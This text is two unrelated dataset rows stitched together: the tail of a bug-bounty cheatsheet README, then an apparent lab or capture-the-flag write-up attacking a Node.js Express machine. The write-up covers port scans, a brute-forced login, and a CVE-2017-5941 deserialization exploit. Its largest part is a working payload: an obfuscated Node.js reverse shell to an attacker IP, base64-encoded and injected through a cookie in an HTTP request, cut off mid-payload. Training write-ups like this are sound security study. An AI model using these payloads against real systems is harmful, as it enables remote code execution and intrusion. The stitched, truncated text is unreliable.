[LFI](cheatsheets/lfi.md)\n- [XXE](cheatsheets/xxe.md)\n- [RCE](cheatsheets/rce.md)\n- [Open Redirect](cheatsheets/open-redirect.md)\n- [Crypto](cheatsheets/crypto.md)\n- [Template Injection](cheatsheets/template-injection.md)\n- [Content Injection](cheatsheets/content-injection.md)\n- [XSLT Injection](cheatsheets/xslt.md)\n\n# Contributing\n\nWe welcome contributions from the public.\n\n### Using the issue tracker 💡\n\nThe issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)\n\n### Issues and labels 🏷\n\nOur bug tracker utilizes several labels to help organize and identify issues.\n\n### Guidelines for bug reports 🐛\n\nUse the GitHub issue search — check if the issue has already been reported.\n\n# Style Guide\n\nWe like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)\n\n- Cheat sheet titles should start with `##`.\n- Subheadings should be made bold. (`**Subheading**`)\n- Add newlines after subheadings and code blocks.\n- Code blocks should use three backticks. (```)\n- Make sure to use syntax highlighting whenever possible.\n\n# Contributors\n\n- [EdOverflow](https://github.com/EdOverflow)\n- [GerbenJavado](https://github.com/GerbenJavado)\n- [jon_bottarini](https://github.com/BlueTower)\n- [sp1d3r](https://github.com/sp1d3r)\n- [yasinS](https://github.com/yasinS)\n- [neutrinoguy](https://github.com/neutrinoguy)\n- [kuromatae](https://github.com/kuromatae)\n"}}},{"rowIdx":674,"cells":{"text":{"kind":"string","value":"# Inteface\n## Table of Contents\n* [Summary](#summary)\n* [Enumerate](#enumerate)\n * [Ports](#ports)\n * [Services](#services)\n * [SSH](#ssh) \n * [HTTP](#http)\n * [OS](#os)\n * [Nmap OS Discovery Scan](#nmap-os-discovery-scan)\n * [Nmap OS Aggresive Scan](#nmap-os-aggresive-scan)\n * [Nmap OS Scripts Scan](#nmap-os-scripts-scan)\n* [Exploit](#exploit)\n * [Password Guessing](#password-guessing) \n * [Patator](#patator)\n * [Hydra](#hydra)\n * [CVE-2017-5941](#cve-2017-5941) \n * [EDB-ID-45265](#edb-id-45265)\n * [piyush-saurabh POC](#piyush-saurabh-poc)\n * [EDB-ID-49552](#edb-id-49552)\n * [Custom POC](#custom-poc)\n* [Solution](#solution)\n* [Explore](#explore)\n* [Escalate](#escalate)\n* [Lessons Learned](#lessons-learned)\n\n## Summary\n* Hostname: inteface\n* Description: This machine is easy and right up your node.\n* IP Address: 192.168.83.106\n* MAC Address: (ref:)\n* Domain: WORKGROUP\n* TCP Ports and Services\n * 22\n * OpenSSH 7.9\n * 80\n * Node.js Express framework \n* OS \n * Distro: Debian (ref: Nmap)\n * Kernel: Linux (ref: Nmap)\n * Architecture: (ref:)\n* Users and passwords (ref:)\n * root\n * dev-acct:password (ref: patator)\n* Vulnerabilities and Exploits\n * CVE-2017-5941 (ref: searchsploit)\n * EDB-ID-45265\n * piyush-saurabh POC\n* Flag\n * decbb74608cf8ea31a4664368686fe74\n* Hints\n * n/a\n\n# Enumerate\n## Setup\n```bash\nTARGET=192.168.83.106\nNAME=interface\nnew-ctf $NAME\ncd $NAME\n```\n\n## Ports\n```bash\nsudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial\nsudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete\nsudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions\n\n# output\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:13 EDT\nNmap scan report for 192.168.83.106\nHost is up (0.074s latency).\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n80/tcp open http Node.js Express framework\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 7.49 seconds\n```\n\n## Services\n### SSH\n```bash\nhydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.83.106\n\n# output\nNSTR\n```\n\n### HTTP\n```bash\ndirb http://$TARGET -r -z10 -o scans/$NAME-dirb-common\ndirb http://$TARGET -w /usr/share/wordlists/dirb/big.txt -r -z10 -o scans/$NAME-dirb-big\n\n# output\n---- Scanning URL: http://192.168.83.106/ ----\n+ http://192.168.83.106/favicon.ico (CODE:200|SIZE:948) \n+ http://192.168.83.106/index.html (CODE:200|SIZE:703) \n```\n```bash\ndirsearch -u 192.168.83.106 -e php -o /home/victor/oscp/pg/labs/interface/scans/interface-dirsearch-php --format=simple\n\n# output\nNSTR\n```\n```bash\nnikto -h $TARGET -p $PORT -T 2 -Format txt -o scans/$NAME-nikto-misconfig\n\n# output\n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP: 192.168.83.106\n+ Target Hostname: 192.168.83.106\n+ Target Port: 80\n+ Start Time: 2021-07-04 17:36:52 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: No banner retrieved\n+ Retrieved x-powered-by header: Express\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ 1351 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time: 2021-07-04 17:38:50 (GMT-4) (118 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n```\n\n## OS\n### Nmap OS Discovery Scan\n```bash\nsudo nmap $TARGET -O -oN scans/$NAME-nmap-os\n\n# output\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:27 EDT\nNmap scan report for 192.168.83.106\nHost is up (0.078s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7/4%OT=22%CT=1%CU=38193%PV=Y%DS=2%DC=I%G=Y%TM=60E227BB\nOS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1=M5\nOS:06ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O\nOS:6=M506ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D\nOS:F=Y%T=40%W=FAF0%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0\nOS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T\nOS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R\nOS:UD=G)IE(R=Y%DFI=N%T=40%CD=S)\n```\n\n### Nmap Aggressive Scan\n```bash\nsudo nmap 192.168.83.106 -A -oN scans/interface-nmap-aggressive\n\n# output\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:19 EDT\nNmap scan report for 192.168.83.106\nHost is up (0.080s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 08:50:f6:e6:aa:44:d6:c4:f1:ca:3c:d1:d9:18:43:4d (RSA)\n| 256 ed:c6:e6:95:88:99:58:31:14:20:38:83:01:e2:e7:15 (ECDSA)\n|_ 256 ba:65:96:08:a2:e2:f5:1f:af:88:6e:55:c7:9c:5f:b1 (ED25519)\n80/tcp open http Node.js Express framework\n|_http-title: App\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=7/4%OT=22%CT=1%CU=33200%PV=Y%DS=2%DC=T%G=Y%TM=60E225FF\nOS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M5\nOS:06ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O\nOS:6=M506ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D\nOS:F=Y%T=40%W=FAF0%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0\nOS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T\nOS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R\nOS:UD=G)IE(R=Y%DFI=N%T=40%CD=S)\n```\n\n### Nmap Scripts Scan\n```bash\nsudo nmap 192.168.83.106 -sC -oN scans/interface-nmap-scripts\n\n# output\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 17:37 EDT\nNmap scan report for 192.168.83.106\nHost is up (0.074s latency).\nNot shown: 998 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\n| ssh-hostkey: \n| 2048 08:50:f6:e6:aa:44:d6:c4:f1:ca:3c:d1:d9:18:43:4d (RSA)\n| 256 ed:c6:e6:95:88:99:58:31:14:20:38:83:01:e2:e7:15 (ECDSA)\n|_ 256 ba:65:96:08:a2:e2:f5:1f:af:88:6e:55:c7:9c:5f:b1 (ED25519)\n80/tcp open http\n|_http-title: App\n\nNmap done: 1 IP address (1 host up) scanned in 10.30 seconds\n```\n\n# Exploit\n## Password Guessing\n### Patator\nThis worked! Patator discovered a valid login (dev-acct:password).\n```bash\n# usernames: http=192.168.132.106/api/users\n# python -c \"names = ; for name in names: print name\" | sort | uniq\n# grep admin, dev, test\npatator http_fuzz url=http://192.168.132.106/login method=POST body='username=FILE0&password=FILE1' 0=usernames.txt 1=/usr/share/wordlists/rockyou.txt -x ignore:fgrep=Unauthorized\n\n# output\n09:39:52 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.1 at 2021-07-05 09:39 EDT\n09:39:52 patator INFO - \n09:39:52 patator INFO - code size:clen time | candidate | num | mesg\n09:39:52 patator INFO - -----------------------------------------------------------------------------\n09:39:52 patator INFO - 200 330:2 0.153 | dev-acct:password | 4 | HTTP/1.1 200 OK\n```\n\n### Hydra\nThis did not work (Hydra never sent any actual web requests; observed using Wireshark).\n```bash\nhydra -l dev-acct -P /usr/share/wordlists/rockyou.txt 192.168.132.106 http-post-form \"/login:{\\\"username\\\"\\:\\\"^USER^\\\",\\\"password\\\"\\:\\\"^PASS^\\\"}:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=Referer: http://192.168.132.106:H=Origin: http://192.168.132.106:Unauthorized\"\n\n# output\nNSTR\n```\n\n## CVE-2017-5941\n### EDB-ID-45265\nThis is not an exploit...\n```bash\nsearchsploit node.js\nmkdir edb-id-45265\ncd edb-id-45265\nsearchsploit -x 45265\ncat 45265.js\n```\n\n### piyush-saurabh POC\nThis did not work.\n```bash\nmkdir piyush-saurabh-poc\ncd piyush-saurabh-poc\nwget https://raw.githubusercontent.com/piyush-saurabh/exploits/master/nodejsshell.py\nsudo nc -nvlp 80\npython nodejsshell 192.168.49.83 80\necho '' | base64\n# use the base64 code as a cookie value\n```\n\n### EDB-ID-49552\nThis did not work.\n```bash\nmkdir edb-id-49552\ncd edb-id-49552\nsearchsploit -m 49552\nvim 49552.py # modify exploit\npython 49552.py\n```\n\n### Custom POC\nSteps summarized.\n```bash\npython nodejsshell.py 192.168.49.132 80\necho -n 'javascript_payload' | base64 -w0 # no new lines; wrap zero lines\n# append this to the Cookie header (after connect.sid) profile=\n# connect.sid represents the authorization to do stuff (dev-acct authentication)\n```\n\nExample.\n```bash\npython nodejsshell.py 192.168.49.132 80\n\n# output\n[+] LHOST = 192.168.49.132\n[+] LPORT = 80\n[+] Encoding\neval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,56,48,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))\n\necho -n 'eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))' | base64 -w0\n\n# output\nZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2LDQ5LDU0LDU2LDQ2LDUyLDU3LDQ2LDQ5LDUxLDUwLDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUyLDUyLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKQ==\n\n# HTTP request\n# I was able to verify my connect.sid value (as dev-acct) by changing the color-theme\n# once I confirmed I had valid credentials, I appended my payload to the Cookie header via the \"profile\" parameter\nPOST /api/settings HTTP/1.1\nHost: 192.168.132.106\nContent-Length: 22\nAccept: application/json, text/plain, */*\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\nContent-Type: application/json\nOrigin: http://192.168.132.106\nReferer: http://192.168.132.106/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: connect.sid=s%3AZqDOBhU5JUHa-6zADULUY_e3_b8ykxng.faM0vT9IFvXPrdv%2FDKoUuvP4HY9PMZnwQA3Silrz7v4; profile=ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2LDQ5LDU0LDU2LDQ2LDUyLDU3LDQ2LDQ5LDUxLDUwLDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUyLDUyLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIs